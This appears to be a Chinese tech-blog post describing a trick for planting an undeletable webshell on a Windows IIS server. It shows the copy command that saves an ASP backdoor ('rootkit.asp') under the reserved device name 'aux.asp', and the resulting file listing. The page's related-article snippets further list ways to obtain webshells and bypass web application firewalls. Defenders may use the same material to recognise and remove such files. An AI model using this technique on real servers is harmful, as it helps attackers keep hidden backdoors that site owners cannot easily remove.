利用系统保留文件名创建无法删除的webshell

最新推荐文章于 2024-05-04 14:23:21 发布
最新推荐文章于 2024-05-04 14:23:21 发布
阅读量957 收藏
点赞数
文章标签: 2010 windows iis 图形 cmd

Windows 下不能够以下面这些字样来命名文件/文件夹,包括:“aux”,“com1”“com2”“prn”“con”和“nul”等,但是通过cmd下是可以创 建此类文件夹的,使用copy命令即可实现:

 

D:/wwwroot>copy rootkit.asp //./D://wwwroot/aux.asp

已复制         1 个文件。


D:/wwwroot>dir

 驱动器 D 中的卷没有标签。

 卷的序列号是 4A56-1D29

 D:/wwwroot 的目录

2010-04-25  14:41    <DIR>          .

2010-04-25  14:41    <DIR>          ..

2010-03-08  22:50            42,756 aux.asp

2005-05-02  03:02             9,083 index.asp

2010-03-08  22:50            42,756 rootkit.asp

               3 个文件         94,595 字节

               2 个目录  3,307,204,608 可用字节

这类文件无法在图形界面删除,如下图所示:

 

只 能在命令行下删除:

 

D:/wwwroot>del //./D:/wwwroot/aux.asp

D:/wwwroot>

然而在IIS中,这种文件又是可以解析成功的。

 

cnbird2008
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
基于python机器学习的分布式webshell检测系统.zip
03-05
基于python机器学习的分布式webshell检测系统.zip 基于python机器学习的分布式webshell检测系统.zip 基于python机器学习的分布式webshell检测系统.zip 基于python机器学习的分布式webshell检测系统.zip
打造永不被删除webshell
weixin_30340745的博客
04-02 87
Windows 下不能够以下面这些字样来命名文件/文件夹,包括:“aux”,“com1”“com2”“prn”“con”和“nul”等,但是通过cmd下是可以创建此类文件夹的,使用copy命令即可实现: D:\wwwroot>copy rootkit.asp \\.\D:\\wwwroot\aux.asp 已复制 1 个文件。 D:\AspWebServer\wwwroot>di...
探究webshell的防删和突破防删
weixin_34102807的博客
10-29 195
文章作者:蚊虫前几天的前几天看到一个传说的防删大马,加密过的,解密是时候弄坏了,下载地址又不记得了闲的蛋疼,就琢磨怎么样实现的呢,首先考虑到属性问题删除文件,记得好像是文件操作 写的一种,那么,给文件几只读属性,不就不能写了吗?这里用我N年前写的修改属性的asp,记得是看到某个大马有这功能,然后闲的蛋疼,自己弄了一个。用”sb.Asp”来做测试文件,然后修改属性为只读这个...
webshell“不死僵尸”asp木马删除不了的解决方法
huike008的博客
03-08 345
昨天用闲来无事用手机浏览博客,打开后发现竟然是个Webshell页面,密码还是默认的“amdin”,果断上电脑上查看,却是可以正常打开博客,经检查发现原来是wap.asp文件被换成大马了,除此之外还多了lpt2.wap.asp和lpt3.wap.asp这两个可疑文件,打开发现同样是ASP木马,进FTP把wap.asp文件替换然后删除另外2个大马却怎么也删除不了,看来是碰到传说的“不死僵...
各种隐藏 WebShell创建删除畸形目录、特殊文件名、黑帽SEO作弊
收集盒 Book box
08-10 5795
地址:http://zone.wooyun.org/index.php?do=view&id=55 标题:求助,某gov网站被挂黑链 作者:赵小布 时间:2012-04-13 14:42 内容:求助,某gov网站被挂黑链,老是清除不掉,过段时间就会出现关于六合彩的黑链脚本,网站应该没问题的,外网只有80端口。怎么回事??? 相关回复: xsser (白日放歌需纵酒) | 2012-04
php 上传webshell,利用php自包含特性上传webshell
weixin_34396941的博客
03-10 611
0x00 前言今天做到一题道来自百度杯十二月第四场的ctf题,题目名字叫blog 进阶篇,当时没做出来,看了writeup才知道竟然还有这种骚操作来上传文件进行包含。0x01 题目复现前面的解题步骤是注册一个账号以后,在post.php页面提交留言内容,这里会有一个insert into注入,可以拿到管理员的密码。利用管理员账号登录上去以后会有一个文件包含点,在上级目录下有flag文件。正常的思...
php加密webshell上传,利用php自包含特性上传webshell
weixin_28862545的博客
03-25 219
0x00 前言今天做到一题道来自百度杯十二月第四场的ctf题,题目名字叫blog 进阶篇,当时没做出来,看了writeup才知道竟然还有这种骚操作来上传文件进行包含。0x01 题目复现前面的解题步骤是注册一个账号以后,在post.php页面提交留言内容,这里会有一个insert into注入,可以拿到管理员的密码。利用管理员账号登录上去以后会有一个文件包含点,在上级目录下有flag文件。正常的思路...
利用 通达OA 文件上传漏洞上传webshell获取主机权限
04-30
帮客户搭建一个演示环境,用于给领导演示,这里我利用了通达OA11.6文件上传漏洞往靶机上上传了一个webshell,然后通过蚁剑去连接webshell从而获取主机权限。 环境要求: 1.靶机环境win10 2.通达OA版本11.6 3.攻击机...
caidao.rar_caidao web_webshell_入侵检测系统
09-15
web系统管理工具,用于入侵检测,国开发者使用。
利用沙盒(脚本虚拟机)检测加密及未知WebShell.pdf
08-07
概述 WebShell常见检测技术及问题 利用脚本虚拟机来检测WebShell(以ASP为例) 脚本虚拟机在实战环境的挑战
java技术栈快速复习04_javaweb基础总结
咖啡味的小认真
04-30 840
JDBC(Java DataBase Connectivity,Java数据库连接)是一种用于执行SQL语句的Java API,可以为多种关系数据库提供统一访问。简单说就是用Java语言来操作数据库。jdbc原理早期SUN公司的天才们想编写一套可以连接天下所有数据库的API,但是当他们刚刚开始时就发现这是不可完成的任务,因为各个厂商的数据库服务器差异太大了。
循环链表 -- c语言实现
weixin_60243362的博客
05-03 647
【代码】循环链表 -- c语言实现。
【无标题】
qq_25699299的博客
04-29 369
变量 A 和 B,分别包含了一些整数。最后,我们遍历新的合并列表并打印出其的元素。方法将两个列表合并成一个新的列表,并通过。合并的结果是1,2,3,4,5,6.在这个示例,我们首先创建了两个。,并对新的列表进行进一步操作。通过这种方式,您可以将两个。
Java常用API之LinkedList类解读
yuanlaishidahuaa的博客
05-02 389
写在开头:本文用于作者学习我将官方文档LinkedList 1.6版本绝大部分API全测了一遍并打印了结果,日拱一卒,常看常新。
批量抓取某电影网站的下载链接
最新发布
知命不惧,日日自新。
05-04 2120
在这个Python项目,开发者创建了一个名为`MovieScraper`的类,用于从网站抓取电影信息。这个类包含了一些方法,每个方法都负责完成一个特定的任务: - `get_response(url)`:向指定的URL发送GET请求并返回响应。 - `get_movie_list_html(response)`:从响应提取电影列表的HTML。 - `get_sub_url_list(movie_list_html)`:从电影列表HTML提取子URL。
【JAVA】part5-Java集合
KX_52517的博客
04-30 1338
Java系列教程之Java集合,本文旨在弄懂Java集合,为Java 学习者提供价值,多说不唠,详见此文!
利用webshell流量检测实验演示各种php webshell变形方法绕WAF
07-28
对于利用webshell流量检测实验演示各种php webshell变形方法绕WAF的问题,根据引用\[1\]和引用\[2\]的内容,可以提供以下回答: Webshell是一种用于获取对服务器某种程度上的操作权限的工具,而php webshell是一种通过网站端口对网站服务器进行操作的权限。在绕过Web应用程序防火墙(WAF)的过程,可以采用多种php webshell变形方法。 其,管理权限拿webshell(进后台)的方法包括正常上传拿webshell、数据库备份拿webshell、突破本地验证拿webshell、上传其他脚本类型拿webshell、00截断拿webshell利用解析漏洞拿webshell利用编辑器拿webshell、网站配置插马拿webshell、通过编辑模板拿webshell、修改脚本直接拿webshell、数据库命令执行拿webshell、添加静态页面拿webshell文件包含拿webshell等方法。\[2\] 而普通权限拿webshell(不进后台)的方法包括0day拿webshell、修改网站上传类型配置来拿webshellIIS写入权限拿webshell、远程命令执行拿webshell、上传漏洞拿webshell、SQL注入拿webshell等方法。\[2\] 综上所述,利用webshell流量检测实验演示各种php webshell变形方法绕WAF的过程,可以根据具体情况选择适合的方法来绕过WAF的检测。 #### 引用[.reference_title] - *1* [PHP常见过waf webshell以及最简单的检测方法](https://blog.csdn.net/weixin_31900373/article/details/115193111)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [拿webshell基础方法总结](https://blog.csdn.net/m0_46230316/article/details/105644775)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值